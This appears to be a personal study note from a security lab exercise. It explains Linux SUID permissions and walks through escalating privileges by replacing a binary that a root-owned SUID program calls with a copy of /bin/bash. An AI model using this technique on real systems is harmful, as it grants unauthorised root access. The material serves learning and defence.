SUID

🗒️ SUID (Set owner User ID) - is a type of special access permission given to a file. A file with SUID always executes as its the owner, regardless of the user passing the command.

• Allows unprivileged users to run scripts or binaries with root permissions, and it's limited to the execution of that specific binary.

• This is not privilege escalation, but can be used to obtain an elevated session

  • e.g. the sudo binary

  
• The exploitation of SUID binaries to get privesc depends on:

  • the owner of the SUID file - e.g. look for root user's SUID binaries

  • access permissions - x executable permissions are required to execute the SUID binary

#Exploitation

ls -al
drwxr-xr-x 1 student student 4096 Sep 22  2018 .
drwxr-xr-x 1 root    root    4096 Sep 22  2018 ..
-rw-r--r-- 1 root    root      88 Sep 22  2018 .bashrc
-r-x------ 1 root    root    8296 Sep 22  2018 greetings
-rwsr-xr-x 1 root    root    8344 Sep 22  2018 welcome

📌 welcome file has the SUID permission applied(in the permissions tab there is a s mentioned which means suid permission

./greetings
	bash: ./greetings: Permission denied
./welcome
	Welcome to Attack Defense Labs

file welcome

welcome: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2,for GNU/Linux 3.2.0, BuildID[sha1]=199bc8fd6e66e29f770cdc90ece1b95484f34fca, not stripped

strings welcome

• It calls greetings binary

rm greetings
cp /bin/bash greetings
./welcome

Here we have removed the greeting binary and made a same binary with the same name and we have given the content through which we can get a /bin/bash session